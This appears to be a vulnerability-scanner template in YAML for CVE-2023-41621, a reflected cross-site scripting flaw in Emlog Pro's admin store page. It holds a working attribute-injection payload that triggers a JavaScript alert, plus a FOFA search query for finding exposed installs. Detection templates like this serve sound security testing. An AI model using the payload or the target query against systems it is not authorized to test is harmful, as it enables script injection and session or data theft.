54 lines
1.4 KiB
YAML
54 lines
1.4 KiB
YAML
|
id: CVE-2023-41621
|
||
|
|
||
|
info:
|
||
|
name: Emlog Pro v2.1.14 - Cross-Site Scripting
|
||
|
author: ritikchaddha
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Cross Site Scripting (XSS) vulnerability in Emlog Pro v2.1.14 via /admin/store.php.
|
||
|
impact: |
|
||
|
Successful exploitation could lead to unauthorized access or data theft.
|
||
|
remediation: |
|
||
|
Update Emlog Pro to the latest version to mitigate the XSS vulnerability (CVE-2023-41621).
|
||
|
reference:
|
||
|
- https://github.com/GhostBalladw/wuhaozhe-s-CVE/blob/main/CVE-2023-41621
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41621
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cve-id: CVE-2023-41621
|
||
|
cwe-id: CWE-79
|
||
|
epss-score: 0.00046
|
||
|
epss-percentile: 0.15636
|
||
|
cpe: cpe:2.3:a:emlog:emlog:2.1.14:*:*:*:pro:*:*:*
|
||
|
metadata:
|
||
|
vendor: emlog
|
||
|
product: emlog
|
||
|
max-request: 1
|
||
|
fofa-query: title="emlog"
|
||
|
tags: cve,cve2023,emlog,xss
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/admin/store.php?"onmouseover='alert(document.domain)'bad="'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: response
|
||
|
words:
|
||
|
- '"onmouseover='alert(document.domain)'bad="'
|
||
|
- "emlog"
|
||
|
condition: and
|
||
|
case-insensitive: true
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|